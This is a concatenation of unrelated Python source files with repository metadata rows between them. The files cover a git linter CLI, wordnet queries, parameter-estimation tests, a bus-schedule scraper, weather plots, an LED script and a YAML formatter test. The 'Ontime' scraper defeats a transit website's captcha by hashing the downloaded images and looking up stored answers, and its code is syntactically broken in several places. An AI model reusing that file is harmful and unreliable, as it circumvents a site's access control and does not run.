editor = os.environ.get("EDITOR", DEFAULT_COMMIT_MSG_EDITOR)
msg_filename_path = os.path.realpath(msg_filename.name)
LOG.debug("run-hook: %s %s", editor, msg_filename_path)
shell(editor + " " + msg_filename_path)
else:
click.echo("Editing only possible when --msg-filename is specified.")
ctx.exit(exit_code)
elif value == "n":
LOG.debug("run-hook: commit message declined")
click.echo("Commit aborted.")
click.echo("Your commit message: ")
click.echo("-----------------------------------------------")
click.echo(ctx.obj.gitcontext.commits[0].message.full)
click.echo("-----------------------------------------------")
ctx.exit(exit_code)
ctx.exit(exit_code)
@cli.command("generate-config")
@click.pass_context
def generate_config(ctx):
""" Generates a sample gitlint config file. """
path = click.prompt('Please specify a location for the sample gitlint config file', default=DEFAULT_CONFIG_FILE)
path = os.path.realpath(path)
dir_name = os.path.dirname(path)
if not os.path.exists(dir_name):
click.echo(f"Error: Directory '{dir_name}' does not exist.", err=True)
ctx.exit(USAGE_ERROR_CODE)
elif os.path.exists(path):
click.echo(f"Error: File \"{path}\" already exists.", err=True)
ctx.exit(USAGE_ERROR_CODE)
LintConfigGenerator.generate_config(path)
click.echo(f"Successfully generated {path}")
ctx.exit(0)
# Let's Party!
setup_logging()
if __name__ == "__main__":
# pylint: disable=no-value-for-parameter
cli() # pragma: no cover
| mit | 6,357,240,374,226,622,000 | 42.684932 | 120 | 0.648531 | false | 3.819924 | true | false | false |
erikdab/pyrelaxmapper | pyrelaxmapper/plwn/queries.py | 1 | 6013 | # -*- coding: utf-8 -*-
"""plWordNet DB queries."""
from sqlalchemy import orm
from sqlalchemy.sql import func
from sqlalchemy.sql.expression import label
from pyrelaxmapper.plwn.models import (Parameter, LexicalUnit, Synset, SynsetRelation,
RelationType, UnitSynset, LexicalRelation)
# TODO: This isn't the proper version number...
def version(session):
"""Query plWordNet for format version."""
value = session.query(Parameter).filter_by(name='programversion').first().value
return value[value.rfind(' ')+1:]
def reltypes(session, types=None):
"""Query for hipernyms.
Parameters
----------
session : orm.session.Session
types : list
RelationType to select (default [10, 11], hiper/hiponyms)
"""
return (session.query(RelationType)
)
def reltypes_pwn_plwn(session):
"""Query plWN for PWN-plWN relation types."""
return (session.query(RelationType.id_)
.filter(RelationType.name.like('%plWN%'))
# Don't take potential, only take certain candidates
.filter(~ RelationType.shortcut.in_(['po_pa', 'po_ap'])))
def pwn_mappings(session, pos=None, pos_en=None):
"""Query plWN for already mapped synsets between plWN and PWN.
Selects: polish synset id, english synset unitsstr, POS
Source: Polish - Target (child): English
RelationType: selects only plWN-PWN mappings
does not take 'po_pa, po_ap' relation types.
POS: Only selects nouns
Parameters
----------
session : orm.session.Session
pos : list of int
pos_en : list of int
"""
if not pos:
pos = [2]
if not pos_en:
pos_en = [6]
rel_types = reltypes_pwn_plwn(session)
syns_en = orm.aliased(Synset)
uas_pl = orm.aliased(UnitSynset)
lunit_pl = orm.aliased(LexicalUnit)
return (session.query(label('pl_uid', Synset.id_), label('en_uid', syns_en.id_),
syns_en.unitsstr, LexicalUnit.pos)
.join(SynsetRelation, Synset.id_ == SynsetRelation.parent_id)
.join(syns_en, SynsetRelation.child_id == syns_en.id_)
.join(UnitSynset, syns_en.id_ == UnitSynset.syn_id)
.join(LexicalUnit, UnitSynset.lex_id == LexicalUnit.id_)
.join(uas_pl, Synset.id_ == uas_pl.syn_id)
.join(lunit_pl, uas_pl.lex_id == lunit_pl.id_)
.join(RelationType, SynsetRelation.rel_id == RelationType.id_)
.filter(RelationType.id_.in_(rel_types))
.filter(LexicalUnit.pos.in_(pos_en))
.filter(lunit_pl.pos.in_(pos))
.group_by(Synset.id_, syns_en.id_, syns_en.unitsstr, LexicalUnit.pos)
.order_by(Synset.id_)
)
def lunits(session, pos=None):
"""Query for lexical units, their lemma and POS.
Parameters
----------
session : orm.session.Session
pos : list
Parts of speech to select (default [2])
Returns
-------
"""
if not pos:
pos = [2]
return (session.query(LexicalUnit)
.filter(LexicalUnit.pos.in_(pos))
.order_by(LexicalUnit.id_)
)
def synsets(session, pos=None):
"""Query for synsets, concatenated ids and lemmas of their LUs.
Parameters
----------
session : orm.session.Session
pos : list
Parts of speech to select (default [2])
"""
if not pos:
pos = [2]
return (session.query(Synset.id_, Synset.definition,
label('lex_ids', func.group_concat(UnitSynset.lex_id)),
label('unitindexes', func.group_concat(UnitSynset.unitindex))
)
.join(UnitSynset)
.join(LexicalUnit)
.filter(LexicalUnit.pos.in_(pos))
.order_by(Synset.id_)
.group_by(Synset.id_)
)
def synset_relations(session, types, pos=None):
"""Query for hipernyms.
Parameters
----------
session : orm.session.Session
types : list
RelationType to select (default [10, 11], hiper/hiponyms)
"""
query = (session.query(SynsetRelation.parent_id, SynsetRelation.child_id,
SynsetRelation.rel_id)
.order_by(SynsetRelation.parent_id)
)
if types:
types = types if isinstance(types, list) else [types]
query = query.filter(SynsetRelation.rel_id.in_(types))
if pos:
pos = pos if isinstance(pos, list) else [pos]
query = (query
.join(UnitSynset, SynsetRelation.parent_id == UnitSynset.syn_id)
.join(LexicalUnit)
.filter(LexicalUnit.pos.in_(pos))
.group_by(SynsetRelation.parent_id, SynsetRelation.child_id,
SynsetRelation.rel_id)
)
return query
def lexical_relations(session, reltypes, pos=None):
"""Query for hipernyms.
Parameters
----------
session : orm.session.Session
reltypes : list
RelationType to select
pos : list
Parts of speech to extract. If empty, extract all.
"""
query = (session.query(LexicalRelation.parent_id, LexicalRelation.child_id,
LexicalRelation.rel_id)
.order_by(LexicalRelation.parent_id)
)
if reltypes:
reltypes = reltypes if isinstance(reltypes, list) else [reltypes]
query = (query
.join(RelationType)
.filter(RelationType.id_.in_(reltypes) |
RelationType.parent_id.in_(reltypes)))
if pos:
pos = pos if isinstance(pos, list) else [pos]
query = (query
.join(LexicalUnit, LexicalRelation.parent_id == LexicalUnit.id_)
.filter(LexicalUnit.pos.in_(pos))
.group_by(LexicalRelation.parent_id, LexicalRelation.child_id,
LexicalRelation.rel_id)
)
return query
| lgpl-3.0 | -6,753,829,671,476,212,000 | 31.327957 | 87 | 0.578247 | false | 3.615755 | false | false | false |
adbuerger/casiopeia | concept_tests/sd_check_pendulum_linear.py | 1 | 4929 | import casadi as ca
import pylab as pl
import casiopeia as cp
import os
# (Model and data taken from: Diehl, Moritz: Course on System Identification,
# exercise 7, SYSCOP, IMTEK, University of Freiburg, 2014/2015)
# Defining constant problem parameters:
#
# - m: representing the ball of the mass in kg
# - L: the length of the pendulum bar in meters
# - g: the gravity constant in m/s^2
# - psi: the actuation angle of the manuver in radians, which stays
# constant for this problem
m = 1.0
L = 3.0
g = 9.81
# psi = pl.pi / 2.0
psi = pl.pi / (180.0 * 2)
# System
x = ca.MX.sym("x", 2)
p = ca.MX.sym("p", 1)
u = ca.MX.sym("u", 1)
# f = ca.vertcat([x[1], p[0]/(m*(L**2))*(u-x[0]) - g/L * pl.sin(x[0])])
f = ca.vertcat(x[1], p[0]/(m*(L**2))*(u-x[0]) - g/L * x[0])
phi = x
system = cp.system.System(x = x, u = u, p = p, f = f, phi = phi)
data = pl.loadtxt('data_pendulum.txt')
time_points = data[:500, 0]
numeas = data[:500, 1]
wmeas = data[:500, 2]
N = time_points.size
ydata = pl.array([numeas,wmeas])
udata = [psi] * (N-1)
ptrue = [3.0]
sim_true = cp.sim.Simulation(system, ptrue)
sim_true.run_system_simulation(time_points = time_points, \
x0 = ydata[:, 0], udata = udata)
# pl.figure()
# pl.plot(time_points, pl.squeeze(sim_true.simulation_results[0,:]))
# pl.plot(time_points, pl.squeeze(sim_true.simulation_results[1,:]))
# pl.show()
p_test = []
sigma = 0.1
wv = (1. / sigma**2) * pl.ones(ydata.shape)
repetitions = 100
for k in range(repetitions):
y_randn = sim_true.simulation_results + \
sigma * (pl.randn(*sim_true.simulation_results.shape))
pe_test = cp.pe.LSq(system = system, time_points = time_points,
udata = udata, xinit = y_randn, ydata = y_randn, wv = wv, pinit = 1)
pe_test.run_parameter_estimation()
p_test.append(pe_test.estimated_parameters)
p_mean = pl.mean(p_test)
p_std = pl.std(p_test, ddof=0)
pe_test.compute_covariance_matrix()
pe_test.print_estimation_results()
# Generate report
print("\np_mean = " + str(ca.DM(p_mean)))
print("phat_last_exp = " + str(ca.DM(pe_test.estimated_parameters)))
print("\np_sd = " + str(ca.DM(p_std)))
print("sd_from_covmat = " + str(ca.diag(ca.sqrt(pe_test.covariance_matrix))))
print("beta = " + str(pe_test.beta))
print("\ndelta_abs_sd = " + str(ca.fabs(ca.DM(p_std) - \
ca.diag(ca.sqrt(pe_test.covariance_matrix)))))
print("delta_rel_sd = " + str(ca.fabs(ca.DM(p_std) - \
ca.diag(ca.sqrt(pe_test.covariance_matrix))) / ca.DM(p_std)))
fname = os.path.basename(__file__)[:-3] + ".rst"
report = open(fname, "w")
report.write( \
'''Concept test: covariance matrix computation
===========================================
Simulate system. Then: add gaussian noise N~(0, sigma^2), estimate,
store estimated parameter, repeat.
.. code-block:: python
y_randn = sim_true.simulation_results + sigma * \
(np.random.randn(*sim_true.estimated_parameters.shape))
Afterwards, compute standard deviation of estimated parameters,
and compare to single covariance matrix computation done in PECas.
''')
prob = "ODE, 2 states, 1 control, 1 param, (pendulum linear)"
report.write(prob)
report.write("\n" + "-" * len(prob) + "\n\n.. code-block:: python")
report.write( \
'''.. code-block:: python
---------------------- casiopeia system definition -----------------------
The system is a dynamic system defined by a set of
explicit ODEs xdot which establish the system state x:
xdot = f(t, u, x, p, we, wu)
and by an output function phi which sets the system measurements:
y = phi(t, x, p).
Particularly, the system has:
1 inputs u
1 parameters p
2 states x
2 outputs phi
Where xdot is defined by:
xdot[0] = x[1]
xdot[1] = (((p/9)*(u-x[0]))-(3.27*x[0]))
And where phi is defined by:
y[0] = x[0]
y[1] = x[1]
''')
report.write("\n**Test results:**\n\n.. code-block:: python")
report.write("\n\n repetitions = " + str(repetitions))
report.write("\n sigma = " + str(sigma))
report.write("\n\n p_true = " + str(ca.DM(ptrue)))
report.write("\n\n p_mean = " + str(ca.DM(p_mean)))
report.write("\n phat_last_exp = " + \
str(ca.DM(pe_test.estimated_parameters)))
report.write("\n\n p_sd = " + str(ca.DM(p_std)))
report.write("\n sd_from_covmat = " \
+ str(ca.diag(ca.sqrt(pe_test.covariance_matrix))))
report.write("\n beta = " + str(pe_test.beta))
report.write("\n\n delta_abs_sd = " + str(ca.fabs(ca.DM(p_std) - \
ca.diag(ca.sqrt(pe_test.covariance_matrix)))))
report.write("\n delta_rel_sd = " + str(ca.fabs(ca.DM(p_std) - \
ca.diag(ca.sqrt(pe_test.covariance_matrix))) / ca.DM(p_std)) \
+ "\n")
report.close()
try:
os.system("rst2pdf " + fname)
except:
print("Generating PDF report failed, is rst2pdf installed correctly?")
| lgpl-3.0 | -143,478,416,205,076,940 | 26.536313 | 78 | 0.602759 | false | 2.720199 | true | false | false |
devlware/Ontime | Ontime.py | 1 | 10829 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Ontime
# Software to download the schedule for all public bus lines in Curitiba.
#
# Copyright (C) 2011 by Diego W. Antunes <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
import urllib2
from urllib2 import Request, urlopen, URLError, HTTPError
from BeautifulSoup import BeautifulSoup
import os
from os.path import join, getsize
import tempfile
import random
import thread, time
import threading
import string
import sqlite3
import getopt, sys
import hashlib
import datetime
__version__ = "1.0"
__author__ = 'Diego W. Antunes'
__license__ = 'MIT'
class Config(object):
""" """
baseurl = 'http://www.urbs.curitiba.pr.gov.br'
horariourl = 'PORTAL/tabelahorario/'
captchaurl = 'PORTAL/tabelahorario/cap.php'
silent = False
DIAS = ["todos", "util", "sabado", "domingo"]
#SENTIDOS = ["ida", "volta"]
#PERIODOS = ["manha", "entrepico", "tarde"]
DICT_DIAS = dict(zip("0123", DIAS))
#DICT_SENTIDOS = dict(zip("IV", SENTIDOS))
database = 'ontime.sqlite'
CreateCaptchaCode = 'CREATE TABLE IF NOT EXISTS CaptchaCode \
(pk INTEGER PRIMARY KEY NOT NULL, shasum TEXT, code TEXT)'
CreateCaptchaSha1 = 'CREATE TABLE IF NOT EXISTS CaptchaSha1 \
(pk INTEGER PRIMARY KEY NOT NULL, fn TEXT, shasum TEXT, size INTEGER, occurrences INTEGER)'
CreateSchedule = 'CREATE TABLE IF NOT EXISTS Schedule \
(pk INTEGER PRIMARY KEY NOT NULL, time TEXT, hasElevator INTEGER)'
CreatePoint = 'CREATE TABLE IF NOT EXISTS Point \
(pk INTEGER PRIMARY KEY NOT NULL, pointName TEXT validity TEXT, weekDay INTEGER)'
CreateLine = 'CREATE TABLE IF NOT EXISTS Line \
(pk INTEGER PRIMARY KEY NOT NULL, lineName TEXT)'
class OntimeException(Exception):
"""Captcha exception."""
class Schedule(object):
""" """
def __init__(self):
pk
time
hasElevator = None
class Point(object):
""" """
def __init__(self):
pk
pointName
validity
weekDay
scheduleID
self.setWeekDay(weekDay)
def setWeekDay(self, day):
""" """
self._weekDay = day
class Line(object):
""" """
def __init__(self, pk, lineName = None):
self._pk
self._lineName
self.setLineName(lineName)
def setPk(self, aCode)
self._pk = aCode
def setLineName(self, line):
self._lineName = line
def data(self):
return self._data
class IMBDataBase(Config):
""" """
_conn = None
_cursor = None
def __init__(self):
""" """
self._conn = sqlite3.connect(Config.database)
self._cursor = self._conn.cursor()
try:
# Create all the tables necessary to the project
self._cursor.execute(CreateCaptchaSha1)
self._cursor.execute(CreateCaptchaCode)
self._cursor.execute(CreateSchedule)
self._cursor.execute(CreatePoint)
self._cursor.execute(CreateLine)
except sqlite3.Error, e:
print "Could not create table...", e.args[0]
sys.exit(1)
try:
self._conn.commit()
except sqlite3.Error, e:
print "Could no commit table creation...", e.args[0]
def saveData(self, fn, sha, size):
""" """
try:
self._cursor.execute('SELECT pk, occurrences FROM CaptchaSha1 WHERE shasum = ?', (sha, ))
row = self._cursor.fetchone()
if row:
pk = row[0]
occ = row[1]
try:
aTuple = (occ+1, pk, )
self._cursor.execute('UPDATE CaptchaSha1 SET occurrences = ? WHERE pk = ?', aTuple)
self._conn.commit()
except sqlite3.Error, e:
print "An error occurred:", e.args[0]
sys.exit(1)
else:
t = (fn, sha, size, 1)
try:
self._cursor.execute('INSERT INTO CaptchaSha1 (fn, shasum, size, occurrences) values (?, ?, ?, ?)', t)
self._conn.commit()
except sqlite3.Error, e:
print "An error occurred:", e.args[0]
sys.exit(1)
except sqlite3.Error, e:
print "An error occurred:", e.args[0]
sys.exit(2)
def closeDB(self):
""" """
self._cursor.close()
self._conn.close()
#class MyThread(threading.Thread):
class MyClass(ScheduleLine):
""" """
def __init__(self):
""" """
print "%s started!" % self.getName()
ScheduleLine.__init__(self, lineName, weekDay, captchaCode)
def run(self):
""" """
cookie = urllib2.HTTPCookieProcessor()
debug = urllib2.HTTPHandler()
self._opener = urllib2.build_opener(debug, cookie)
self._baseurl = baseurl
self._data = { 'info' : [] }
urllib2.install_opener(self._opener)
def request(self, data = None):
"""Method used to request server/carrier data."""
final = self._baseurl + '/' + url
request = urllib2.Request(final)
request.add_header('User-Agent', "Ontime/%s" % __version__)
request.add_header('Accept-Encoding', 'gzip')
if data is not None:
request.add_data(data)
descriptor = self._opener.open(request)
data = descriptor.read()
descriptor.close()
soup = BeautifulSoup(data)
handler(soup)
def getCaptcha(self, data = None):
req = urllib2.Request(captchaurl)
try:
response = urllib2.urlopen(req)
except URLError, e:
if hasattr(e, 'reason'):
print('We failed to reach a server.')
print('Reason: ', e.reason)
elif hasattr(e, 'code'):
print('The server couldn\'t fulfill the request.')
print('Error code: ', e.code)
else:
print('no problems found')
imgData = response.read()
imgFilename = ''.join(random.choice(string.ascii_uppercase + string.digits) for x in range(10)) + '.png'
imgFileString = str(imgData)
h = hashlib.sha1()
h.update(imgFileString)
fileHash = h.hexdigest()
self._cursor.execute('SELECT code FROM CaptchaCode WHERE shasum = ?', (fileHash, ))
self.captchaCode = self._cursor.fetchone()[0]
if not self.captchaCode:
return None
return self.captchaCode
def _parseMenu(self, soup):
box = soup.find('select')
if box is None:
else:
boxd = box.findAll()
menu = soup.find(id="cboLinha")
menuOps = menu.findAll("option")
a = []
b = []
for i in menuOps:
a.append(i.contents[0])
b.append(i.attrs[0][1])
"""
Codigo para colocar no banco de dados as informacoes
for i in range(len(a)):
cursor.execute('INSERT INTO Line (lineName, pk) values (?, ?)', (a[i], int(str(b[i]))))
"""
tipoDia = soup.find(id="cboTipoDia")
opcoes = tipoDia.findAll("option") # retorna uma lista
for i in opcoes:
print i.contents
print i.attrs[0][1]
#como pegar o numero de um option
a[1].attrs[0][1]
# o retorno
u'528'
def usage():
"""Returns usage message."""
return "Usage: %s\n" \
"-d\t--database\tUses a specific <database>\n" \
"-o\t--download\n" \
"-r\t--repetition\tDefines the number of repetitions\n" \
"-h\t--help\t\tThis help" % sys.argv[0]
def download(rep):
""" """
home = os.path.abspath(os.environ['HOME'])
dirName = join(home, 'tmp', 'img')
if os.path.exists(dirName):
os.chdir(dirName)
else:
sys.exit(1)
# run the easy stuff, create a thread and make it download an captcha image
i = 0
for x in range(rep):
# startTime = datetime.datetime.now()
mythread = MyThread(name = "Thread-%d" % (x + 1))
mythread.start()
if i > 50:
time.sleep(3)
i = 0
i += 1
def parseImgFile(dbHandler):
""" """
home = os.path.abspath(os.environ['HOME'])
dirName = join(home, 'tmp', 'img')
if os.path.exists(dirName):
files = os.listdir(dirName)
for filename in files:
f = open(join(dirName, filename), 'rb')
h = hashlib.sha1()
h.update(f.read())
fileHash = h.hexdigest()
fileSize = getsize(join(dirName, filename))
f.close()
dbHandler.saveData(str(filename), str(fileHash), fileSize)
else:
print dirName + 'is not available'
sys.exit(1)
dbHandler.closeDB()
def main():
database = None
repetition = None
down = False
try:
opts, args = getopt.getopt(sys.argv[1:], "hod:r:", ["help", "download", "database=", "repetition="])
except getopt.GetoptError as err:
print(err)
print usage()
sys.exit(2)
for option, value in opts:
if option in ('-h', '--help'):
print usage()
sys.exit(0)
elif option in ('-o', '--download'):
down = True
elif option in ('-r', '--repetition'):
repetition = value
elif option in ('-d', '--database'):
database = value
else:
assert False, "unhandled option"
# download the image files
if repetition > 0 and down:
download(int(repetition))
# if a database was set, handle the downloaded files
if database:
myDB = IMBDataBase(database)
parseImgFile(myDB)
if __name__ == '__main__':
main()
| mit | 4,252,157,633,065,306,000 | 29.418539 | 122 | 0.574938 | false | 3.799649 | false | false | false |
akrherz/iem | htdocs/plotting/auto/scripts/p19.py | 1 | 7899 | """histogram"""
import datetime
from collections import OrderedDict
import numpy as np
import pandas as pd
from pandas.io.sql import read_sql
from matplotlib.font_manager import FontProperties
from pyiem import network
from pyiem.plot import figure, get_cmap
from pyiem.util import get_autoplot_context, get_dbconn
from pyiem.exceptions import NoDataFound
# Use OrderedDict to keep webform select in this same order!
MDICT = OrderedDict(
[
("all", "No Month/Season Limit"),
("spring", "Spring (MAM)"),
("fall", "Fall (SON)"),
("winter", "Winter (DJF)"),
("summer", "Summer (JJA)"),
("jan", "January"),
("feb", "February"),
("mar", "March"),
("apr", "April"),
("may", "May"),
("jun", "June"),
("jul", "July"),
("aug", "August"),
("sep", "September"),
("oct", "October"),
("nov", "November"),
("dec", "December"),
]
)
def get_description():
""" Return a dict describing how to call this plotter """
desc = dict()
desc["data"] = True
desc[
"description"
] = """This chart displays a histogram of daily high
and low temperatures for a station of your choice. If you optionally
choose to overlay a given year's data and select winter, the year of
the December is used for the plot. For example, the winter of 2017 is
Dec 2017 thru Feb 2018. The plot details the temperature bin with the
highest frequency."""
desc["arguments"] = [
dict(
type="station",
name="station",
default="IA0200",
label="Select Station:",
network="IACLIMATE",
),
dict(
type="int",
name="binsize",
default="10",
label="Histogram Bin Size:",
),
dict(
type="select",
name="month",
default="all",
label="Month Limiter",
options=MDICT,
),
dict(
type="year",
optional=True,
default=datetime.date.today().year,
label="Optional: Overlay Observations for given year",
name="year",
),
dict(type="cmap", name="cmap", default="Blues", label="Color Ramp:"),
]
return desc
def plotter(fdict):
""" Go """
pgconn = get_dbconn("coop")
ctx = get_autoplot_context(fdict, get_description())
station = ctx["station"]
binsize = ctx["binsize"]
month = ctx["month"]
year = ctx.get("year")
table = "alldata_%s" % (station[:2],)
nt = network.Table("%sCLIMATE" % (station[:2],))
if month == "all":
months = range(1, 13)
elif month == "fall":
months = [9, 10, 11]
elif month == "winter":
months = [12, 1, 2]
elif month == "spring":
months = [3, 4, 5]
elif month == "summer":
months = [6, 7, 8]
else:
ts = datetime.datetime.strptime("2000-" + month + "-01", "%Y-%b-%d")
# make sure it is length two for the trick below in SQL
months = [ts.month, 999]
ddf = read_sql(
f"SELECT high, low, year, month from {table} WHERE station = %s "
"and year > 1892 and high >= low and month in %s",
pgconn,
params=(station, tuple(months)),
index_col=None,
)
if ddf.empty:
raise NoDataFound("No Data Found.")
ddf["range"] = ddf["high"] - ddf["low"]
xbins = np.arange(ddf["low"].min() - 3, ddf["low"].max() + 3, binsize)
ybins = np.arange(ddf["high"].min() - 3, ddf["high"].max() + 3, binsize)
hist, xedges, yedges = np.histogram2d(
ddf["low"], ddf["high"], [xbins, ybins]
)
rows = []
for i, xedge in enumerate(xedges[:-1]):
for j, yedge in enumerate(yedges[:-1]):
rows.append(dict(high=yedge, low=xedge, count=hist[i, j]))
df = pd.DataFrame(rows)
ab = nt.sts[station]["archive_begin"]
if ab is None:
raise NoDataFound("Unknown station metadata.")
years = float(datetime.datetime.now().year - ab.year)
hist = np.ma.array(hist / years)
hist.mask = np.where(hist < (1.0 / years), True, False)
ar = np.argwhere(hist.max() == hist)
title = f"[{station}] {nt.sts[station]['name']}"
subtitle = (
"Daily High vs Low Temperature Histogram + Range between Low + High "
f"(month={month.upper()})"
)
fig = figure(title=title, subtitle=subtitle)
kax = fig.add_axes([0.65, 0.5, 0.3, 0.36])
kax.grid(True)
kax.text(
0.02,
1.02,
"Daily Temperature Range Histogram + CDF",
transform=kax.transAxes,
bbox=dict(color="tan"),
va="bottom",
)
kax.hist(ddf["range"].values, density=True, color="lightgreen")
kax.set_ylabel("Density")
kax2 = kax.twinx()
kax2.set_ylabel("Cumulative Density")
kax2.hist(
ddf["range"].values,
density=True,
cumulative=100,
histtype="step",
color="k",
)
kax.set_xlim((kax.get_xlim()[0], ddf["range"].max()))
# Table of Percentiles
ranks = ddf["range"].quantile(np.arange(0, 1.0001, 0.0025))
xpos = 0.62
ypos = 0.37
fig.text(
0.65,
ypos + 0.03,
"Daily Temperature Range Percentiles",
bbox=dict(color="tan"),
)
fig.text(xpos - 0.01, ypos - 0.01, "Percentile Value")
ypos -= 0.01
monofont = FontProperties(family="monospace")
for (q, val) in ranks.iteritems():
if 0.02 < q < 0.98 and (q * 100.0 % 10) != 0:
continue
if q > 0.1 and int(q * 100) in [20, 90]:
xpos += 0.13
ypos = 0.37
fig.text(xpos - 0.01, ypos - 0.01, "Percentile Value")
ypos -= 0.01
ypos -= 0.025
label = f"{q * 100:-6g} {val:-6.0f}"
fig.text(xpos, ypos, label, fontproperties=monofont)
ax = fig.add_axes([0.07, 0.17, 0.5, 0.73])
res = ax.pcolormesh(xedges, yedges, hist.T, cmap=get_cmap(ctx["cmap"]))
cax = fig.add_axes([0.07, 0.08, 0.5, 0.01])
fig.colorbar(res, label="Days per Year", orientation="horizontal", cax=cax)
ax.grid(True)
ax.set_ylabel(r"High Temperature $^{\circ}\mathrm{F}$")
ax.set_xlabel(r"Low Temperature $^{\circ}\mathrm{F}$")
xmax = ar[0][0]
ymax = ar[0][1]
ax.text(
0.65,
0.15,
("Largest Frequency: %.1d days\n" "High: %.0d-%.0d Low: %.0d-%.0d")
% (
hist[xmax, ymax],
yedges[ymax],
yedges[ymax + 1],
xedges[xmax],
xedges[xmax + 1],
),
ha="center",
va="center",
transform=ax.transAxes,
bbox=dict(color="white"),
)
if ddf["high"].min() < 32:
ax.axhline(32, linestyle="-", lw=1, color="k")
ax.text(
ax.get_xlim()[1],
32,
r"32$^\circ$F",
va="center",
ha="right",
color="white",
bbox=dict(color="k"),
fontsize=8,
)
if ddf["low"].min() < 32:
ax.axvline(32, linestyle="-", lw=1, color="k")
ax.text(
32,
ax.get_ylim()[1],
r"32$^\circ$F",
va="top",
ha="center",
color="white",
bbox=dict(facecolor="k", edgecolor="none"),
fontsize=8,
)
if year:
label = str(year)
if month == "winter":
ddf["year"] = (
ddf[((ddf["month"] == 1) | (ddf["month"] == 2))]["year"] - 1
)
label = "Dec %s - Feb %s" % (year, year + 1)
ddf2 = ddf[ddf["year"] == year]
ax.scatter(
ddf2["low"],
ddf2["high"],
marker="o",
s=30,
label=label,
edgecolor="yellow",
facecolor="red",
)
ax.legend()
return fig, df
if __name__ == "__main__":
plotter(dict())
| mit | -73,954,351,743,601,700 | 29.034221 | 79 | 0.515888 | false | 3.317514 | false | false | false |
JohnOmernik/pimeup | ledsound/LED_Sound.py | 1 | 2592 | #!/usr/bin/python
import time
import random
import sys
import alsaaudio
import wave
import sys
import struct
import math
from dotstar import Adafruit_DotStar
numpixels = 60 # Number of LEDs in strip
# Here's how to control the strip from any two GPIO pins:
datapin = 23
clockpin = 24
defaultColor = 0x0000FF
defaultBright = 32
flashColor = 0xF0F0FF
flashBright = 255
strip = Adafruit_DotStar(numpixels, datapin, clockpin)
strip.setBrightness(defaultBright)
strip.begin() # Initialize pins for output
hi_thres = 200
low_thres = 100
lightning = False
def main():
global strip
global lightning
sounds = [0, 0, 0]
channels = 2
rate = 44100
size = 1024
out_stream = alsaaudio.PCM(alsaaudio.PCM_PLAYBACK, alsaaudio.PCM_NORMAL, 'default')
out_stream.setformat(alsaaudio.PCM_FORMAT_S16_LE)
out_stream.setchannels(channels)
out_stream.setrate(rate)
out_stream.setperiodsize(size)
strip.setBrightness(defaultBright)
setAllLEDS(strip, [defaultColor])
strip.show()
thunderfiles = ['thunder.wav']
while True:
curfile = random.choice(thunderfiles)
curstream = open(curfile, "rb")
data = curstream.read(size)
tstart = 0
while data:
tstart += 1
out_stream.write(data)
data = curstream.read(size)
rmsval = rms(data)
sounds.append(rmsval)
ug = sounds.pop(0)
sounds_avg = sum(sounds) / len(sounds)
print(sounds_avg)
if sounds_avg > hi_thres and lightning == False:
strip.setBrightness(flashBright)
setAllLEDS(strip, [flashColor])
lightning = True
if sounds_avg < low_thres and lightning == True:
strip.setBrightness(defaultBright)
setAllLEDS(strip, [defaultBright])
lightning = False
curstream.close()
sys.exit(0)
def setAllLEDS(strip, colorlist):
numcolors = len(colorlist)
for x in range(numpixels):
idx = x % numcolors
strip.setPixelColor(x, colorlist[idx])
strip.show()
def rms(frame):
SHORT_NORMALIZE = (1.0/32768.0)
CHUNK = 1024
swidth = 2
count = len(frame)/swidth
format = "%dh"%(count)
shorts = struct.unpack( format, frame )
sum_squares = 0.0
for sample in shorts:
n = sample * SHORT_NORMALIZE
sum_squares += n*n
rms = math.pow(sum_squares/count,0.5);
return rms * 10000
if __name__ == "__main__":
main()
| apache-2.0 | 2,788,391,041,103,778,300 | 21.53913 | 87 | 0.609568 | false | 3.383812 | false | false | false |
dtroyer/cliff | cliff/tests/test_formatters_yaml.py | 1 | 3058 | #!/usr/bin/env python
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import six
import yaml
from cliff.formatters import yaml_format
from cliff.tests import base
from cliff.tests import test_columns
import mock
class TestYAMLFormatter(base.TestBase):
def test_format_one(self):
sf = yaml_format.YAMLFormatter()
c = ('a', 'b', 'c', 'd')
d = ('A', 'B', 'C', '"escape me"')
expected = {
'a': 'A',
'b': 'B',
'c': 'C',
'd': '"escape me"'
}
output = six.StringIO()
args = mock.Mock()
sf.emit_one(c, d, output, args)
actual = yaml.safe_load(output.getvalue())
self.assertEqual(expected, actual)
def test_formattablecolumn_one(self):
sf = yaml_format.YAMLFormatter()
c = ('a', 'b', 'c', 'd')
d = ('A', 'B', 'C', test_columns.FauxColumn(['the', 'value']))
expected = {
'a': 'A',
'b': 'B',
'c': 'C',
'd': ['the', 'value'],
}
args = mock.Mock()
sf.add_argument_group(args)
args.noindent = True
output = six.StringIO()
sf.emit_one(c, d, output, args)
value = output.getvalue()
print(len(value.splitlines()))
actual = yaml.safe_load(output.getvalue())
self.assertEqual(expected, actual)
def test_list(self):
sf = yaml_format.YAMLFormatter()
c = ('a', 'b', 'c')
d = (
('A1', 'B1', 'C1'),
('A2', 'B2', 'C2'),
('A3', 'B3', 'C3')
)
expected = [
{'a': 'A1', 'b': 'B1', 'c': 'C1'},
